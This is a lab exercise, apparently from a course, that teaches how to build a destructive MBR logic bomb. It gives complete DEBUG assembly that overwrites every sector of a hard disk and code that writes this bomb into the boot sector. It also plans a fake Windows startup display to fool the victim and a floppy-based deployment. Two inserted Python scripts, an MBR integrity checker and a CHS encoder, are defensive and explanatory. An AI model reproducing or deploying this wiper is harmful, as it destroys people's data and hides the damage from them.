Understanding Destructive MBR Logic Bombs

Materials:
Working complete PC
Blank Diskette
Student Diskette, "New Boot A Ver 2.0+"
Student CD-ROM, "Room 6359"
Objectives:
The student will become familiar with MBR-installed logic bombs, including:
designing an effective logic bomb,
building the logic bomb,
saving the logic bomb to a file,
deploying the logic bomb in the MBR.
Competency:
The student will learn how to design an effective logic bomb that will destroy all data on the HDD, then use DEBUG to create the logic bomb, save it to a file, and deploy it in the MBR sector from the file. The student will then boot the PC, allow the logic bomb to do its damage, and then reboot to the student CD-ROM and check whether it worked.

Preparation:

  1. Since the planned logic bomb will do large-scale devastation to the target HDD, a Ghost restore image will be placed on a lab PC for the purposes of developing and testing the logic bomb. It is highly destructive and should never be tested on a PC of any value.

Procedures:

  3. After preparing a "guinea pig" PC run DEBUG and save the MBR to a file on a bootable floppy diskette so that it can be restored at will along with a GHOST restoration of the entire HDD if and when necessary during the course of this operation.

  4. The MBR will then be modified into a logic bomb and saved again as a file with a different name. Later, batch files will be developed for deploying the logic bomb. The purpose of the logic bomb is to destroy the contents of the HDD if the PC is booted by anyone who does not know about the existence of the bomb and how to keep it from destroying the HDD. The logic bomb works by placing the destructive code within the MBR, which executes automatically when the PC boots up. The changed MBR code will proceed to overwrite the HDD sector-by-sector with nonsense rather than do what it is supposed to do, which is to find and launch the DBR of the active partition.
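The good MBR saved in step 3 is the reference against which a drive's first sector can later be checked. The following Python script is an added example, not part of the original page: it parses a 512-byte MBR image such as the one DEBUG writes with the W command, verifies the 55AAh boot signature, lists the partition table (so the active partition whose DBR the MBR should launch is visible), and compares the SHA-256 of the boot-code area against the hash of the saved good copy. The two MBR images in the script are constructed stand-ins, not sectors from a real drive, and all function names are this example's own.

```python
"""Checking a saved MBR image against a known-good copy (added example)."""
from __future__ import annotations

import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446           # bytes 0..445 hold the boot code
PART_TABLE_OFF = 446          # four 16-byte partition entries follow
BOOT_SIGNATURE = b"\x55\xAA"  # bytes 510..511


def parse_mbr(sector: bytes) -> dict:
    """Return signature status, boot-code hash and the non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    partitions = []
    for i in range(4):
        entry = sector[PART_TABLE_OFF + 16 * i: PART_TABLE_OFF + 16 * (i + 1)]
        (status, sh, ss, sc, ptype, eh, es, ec,
         lba_start, lba_count) = struct.unpack("<BBBBBBBBII", entry)
        if ptype == 0 and lba_count == 0:
            continue  # unused slot
        partitions.append({
            "index": i,
            "active": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "lba_count": lba_count,
            # CHS start: cylinder high bits live in the top two bits of the sector byte
            "chs_start": (((ss & 0xC0) << 2) | sc, sh, ss & 0x3F),
        })
    return {
        "signature_ok": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def check_against_baseline(sector: bytes, baseline_sha256: str) -> list[str]:
    """Return a list of findings; an empty list means the MBR matches the saved copy."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 55AA missing")
    if info["boot_code_sha256"] != baseline_sha256:
        findings.append("boot code differs from the saved good copy")
    if sum(1 for p in info["partitions"] if p["active"]) != 1:
        findings.append("expected exactly one active partition")
    return findings


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample MBR: given boot code, one active type-07h partition, signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    # status 80h (active), start C/H/S 0/1/1, type 07h, end C/H/S 1023/254/63,
    # LBA start 63, 2097152 sectors: values chosen for the demonstration only
    entry = struct.pack("<BBBBBBBBII", 0x80, 1, 1, 0, 0x07, 0xFE, 0xFF, 0xFF, 63, 2097152)
    sector[PART_TABLE_OFF:PART_TABLE_OFF + 16] = entry
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


# Constructed stand-in for the good MBR saved with DEBUG's W command
GOOD_MBR = build_sample_mbr(b"\xFA\x33\xC0" + b"\x90" * 40)
GOOD_SHA = parse_mbr(GOOD_MBR)["boot_code_sha256"]
# Constructed stand-in for a sector whose boot area was changed but whose table was kept
MODIFIED_MBR = build_sample_mbr(b"\xCC" * 16 + b"\x90" * 40)

if __name__ == "__main__":
    for name, image in (("good", GOOD_MBR), ("modified", MODIFIED_MBR)):
        info = parse_mbr(image)
        print(name, "partitions:", info["partitions"])
        print(name, "findings:", check_against_baseline(image, GOOD_SHA) or "none")
```

To use it against a real saved file, read the 512 bytes of the good copy once, record its `boot_code_sha256`, and run `check_against_baseline` on any later image of physical sector 1; a hash mismatch with an intact partition table is exactly the pattern a boot-code-only modification leaves.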

  5. The logic bomb code must do the following:

    1. Set the Data Segment of the CPU to 07C0h, which is the physical RAM segment to which the MBR gets loaded by the BIOS Boot Strap Loader.
    2. Set the Extra Segment of the CPU to F000h, the segment at which the BIOS ROM code appears in the address space. This will be the data that will be written to the sectors, thereby overwriting the important data with it. The BIOS INT 13h call uses the ES rather than the DS, which is actually useful in that normal variables can be accessed with the DS and HDD read/writes can be pointed to by the ES.
    3. Most modern ATA controllers and HDDs support 64-sector "block transfers". This means that 64 sectors at a time can be read from or written to the HDD in a single INT 13h call. This is fortunate in that it will speed up the logic bomb code as well as simplify it. The basic concept is that, using geometry, we want the logic bomb to point to Cylinder 0, Head 0, Sector 1 and write 64 sectors of garbage (the BIOS ROM code) to it, blowing away the entire track, then advance to the next head and do it again, and so on to the last head; then advance to Cylinder 1, Head 0, Sector 1 and do it again, counting up through the heads to the last one; then advance to the next cylinder's Head 0, Sector 1 and continue up to the last cylinder and then quit. This will require that you know the geometry of the HDD. For the purposes of this exercise it will be assumed to be a drive larger than 8.4GB (the classic translated geometry limit) with a geometry of Cyls = 1024, Heads = 255, Sectors/Track = 63.
    4. Later the logic bomb will be modified to "entertain" the unsuspecting user who attempts to start the PC with what appears to be normal screen display activities of Windows XP starting up, but these will be dummies intended to make the user think that the machine is booting normally when in actuality the logic bomb will be busily doing its job of destroying the contents of the HDD.
  6. While in DEBUG, use the N command and name the file "bug.mbr" and then use the W command to save it under the new name.
  7. The actual machine language instructions are listed below along with explanations:
    MOV AX, F000   These two lines set the ES register to F000, the segment of the
    MOV ES, AX     BIOS ROM code, as the data source to be written to the HDD sectors
    XOR BX, BX     This is a legal instruction that rapidly sets BX = 0
    MOV DL, 80     This sets the INT 13h parameter to work on physical drive 80h
    MOV CL, 1      INT 13h parameter, target sector is Sector #1
    MOV CH, 0      INT 13h parameter, target sector is in Cyl #0
    MOV DH, 0      INT 13h parameter, target sector is in Head #0
    MOV AX, 0340   INT 13h parameters, 03 = Write, 40 = 64 sectors
    INT 13         Call BIOS INT 13h services
    INC DH         Advance to the next Head number (INC = INCrement by one)
    CMP DH, FF     Check to make sure it has not reached 255, which does not exist
                   (NOTE: the HDD has 255 heads, they are numbered 0 - 254)
    JE (current offset + 4) Once this value is reached, the cylinder # must be incremented
                   and the Head number must be reset to 0; the jump will occur only if the
                   preceding compare found the value in DH = FF
    JMP (offset of the MOV AX, 0340 instruction) This repeats the call to write 64 sectors,
                   having changed the register value to point to the next head number
    INC CH         Advance to the next Cylinder #
    CMP CH, 0      Cylinder 255 DOES exist, so we check to see if it wrapped back around to 0
    JE (offset + 4) If it has wrapped around to 0 again, then jump to change the sector #
                   (NOTE: the top 2 bits of the sector number held in CL are the top 2 bits
                   of a 10-bit cylinder number)
    JMP (offset of the MOV DH, 0 instruction) Otherwise continue the loop and reset the head
                   number to 0
    ADD CL, 40     This adds one to the top 2 bits of the sector number, advancing the top 2
                   bits which belong to the 10-bit cylinder number
    JC (offset + 4) This is done because C1h + 40h = 101h, but the third hex digit does not
                   fit in the 8-bit register, so the result is truncated to 01. However,
                   the addition will set the carry flag
    JMP (offset of the MOV CH, 0 instruction) This will be sure to reset the bottom 8 bits
                   of the cylinder number to 0 and reset the head number to zero, then call
                   BIOS to write 64 sectors, continuing the loop
    NOP            This prepares to hang the machine executing the instruction that does
                   nothing
    JMP (offset of the NOP instruction) Loops forever on the NOP instruction
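The register packing that the listing relies on (the geometry in step 3 of the design requirements, and the notes on CL's top two bits and the carry flag next to ADD CL, 40) is standard INT 13h CHS addressing. The following Python script is an added example, not part of the original page: it packs a cylinder/head/sector triple into the CH, CL and DH values INT 13h expects, unpacks them back, emulates the 8-bit ADD CL, 40 to show why the carry flag appears exactly when the 10-bit cylinder number would exceed 1023, and computes the capacity addressable with the assumed 1024/255/63 geometry. The function names are this example's own; the register layout is the documented INT 13h one.

```python
"""INT 13h CHS register encoding (added example, not from the original page)."""
from __future__ import annotations

MAX_CYLINDER = 1023   # 10-bit cylinder field: 0..1023
MAX_HEAD = 255        # 8-bit head field in DH: 0..255
MAX_SECTOR = 63       # 6-bit sector field in CL, numbered 1..63


def pack_chs(cylinder: int, head: int, sector: int) -> tuple[int, int, int]:
    """Return (CH, CL, DH) for an INT 13h call addressing this CHS triple.

    CH holds cylinder bits 0-7; CL holds cylinder bits 8-9 in its top two
    bits and the 1-based sector number in its low six bits; DH holds the head.
    """
    if not 0 <= cylinder <= MAX_CYLINDER:
        raise ValueError(f"cylinder {cylinder} outside 0..{MAX_CYLINDER}")
    if not 0 <= head <= MAX_HEAD:
        raise ValueError(f"head {head} outside 0..{MAX_HEAD}")
    if not 1 <= sector <= MAX_SECTOR:
        raise ValueError(f"sector {sector} outside 1..{MAX_SECTOR}")
    ch = cylinder & 0xFF
    cl = ((cylinder >> 8) << 6) | sector
    return ch, cl, head


def unpack_chs(ch: int, cl: int, dh: int) -> tuple[int, int, int]:
    """Inverse of pack_chs: recover (cylinder, head, sector) from the registers."""
    cylinder = ((cl & 0xC0) << 2) | ch
    sector = cl & 0x3F
    return cylinder, dh, sector


def add_cl_40(cl: int) -> tuple[int, bool]:
    """Emulate the 8-bit 'ADD CL, 40' and report the carry flag.

    Adding 40h adds 1 to the top two bits of CL, i.e. 256 to the cylinder
    number. When those bits are already 11 (cylinder >= 768) the sum exceeds
    FFh, the register keeps only the low 8 bits, and CF is set.
    """
    total = cl + 0x40
    return total & 0xFF, total > 0xFF


def geometry_capacity_bytes(cylinders: int, heads: int, sectors: int,
                            sector_size: int = 512) -> int:
    """Bytes addressable with a CHS geometry (1024/255/63 gives the 8.4 GB limit)."""
    return cylinders * heads * sectors * sector_size


if __name__ == "__main__":
    ch, cl, dh = pack_chs(0, 0, 1)
    print(f"C0/H0/S1 -> CH={ch:02X} CL={cl:02X} DH={dh:02X}")
    # Walk CL through the four cylinder-high-bit values until the add carries
    steps, carry = [], False
    while not carry:
        steps.append(f"{cl:02X} (cyl base {unpack_chs(0, cl, 0)[0]})")
        cl, carry = add_cl_40(cl)
    print("CL after each ADD CL,40:", " -> ".join(steps), "-> carry set")
    print("Capacity of 1024/255/63:", geometry_capacity_bytes(1024, 255, 63), "bytes")
```

Running it shows CL stepping 01 -> 41 -> 81 -> C1 (cylinder bases 0, 256, 512, 768) and the carry appearing on the fourth addition, which is the condition the listing's JC tests; the capacity figure of 8,422,686,720 bytes is where the "8.4GB" translated-geometry limit comes from.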
    
    
  8. Now all that remains is to enter this code into "BUG.MBR" and save it again. Start the DEBUG assembler with "a 100" and type in the above code; when a jump instruction needs an offset, calculate it or read it from the listing as the case requires and enter it:

    -a 100
    0AFE:0100 mov ax, f000
    0AFE:0103 mov es, ax
    0AFE:0105 xor bx, bx
    0AFE:0107 mov dl, 80
    0AFE:0109 mov cl, 1
    0AFE:010B mov ch, 0
    0AFE:010D mov dh, 0
    0AFE:010F mov ax, 340
    0AFE:0112 int 13
    0AFE:0114 inc dh
    0AFE:0116 cmp dh, ff
    0AFE:0119 je 11d <- 119 + 4 = 11D hex
    0AFE:011B jmp 10f <- address of mov ax, 340
    0AFE:011D inc ch
    0AFE:011F cmp ch, 0
    0AFE:0122 je 126 <- 122 + 4 = 126
    0AFE:0124 jmp 10d <- address of mov dh, 0 
    0AFE:0126 add cl, 40
    0AFE:0129 jc 12d <- 129 + 4 = 12D hex
    0AFE:012B jmp 10b <- address of mov ch, 0
    0AFE:012D nop
    0AFE:012E jmp 12d <- address of nop
    0AFE:0130
    -
    

  9. Execute the W command again to save the changes. Now create and execute the code within DEBUG that will write the new MBR code to the first physical sector of the HDD:

    -a 300
    0AFE:0300 mov ax, 301
    0AFE:0303 mov bx, 100
    0AFE:0306 mov cx, 1
    0AFE:0309 mov dx, 80
    0AFE:030C int 13
    0AFE:030E int 3
    0AFE:030F
    -g=300
    

  10. The logic bomb is now in place. Reboot the machine to the HDD. At the point after the POST screens, with the cursor at the bottom of the screen, when the OS startup should begin, the system will simply hang. Observe the HDD activity light. It should stay lit, indicating constant activity as the loop proceeds to overwrite the entire drive with a 32KB section of the BIOS code block at F000:0000h.

  11. Interrupt the logic bomb by pressing [Ctrl]+[Alt]+[Delete] after about 20 seconds, roughly the amount of time that the average user would wait at this point before realizing that something is wrong. Insert New Boot A or its equivalent and start Norton Utilities DiskEdit. Change to Physical Disks > Physical Hard Disk 1. Then page down through the disaster.

  12. In the next exercise, an easy deployment method using a bootable floppy diskette equipped with batch files that can load either the good MBR or the bad one will be developed.


Copyright © 2000-2006 Brian Robinson ALL RIGHTS RESERVED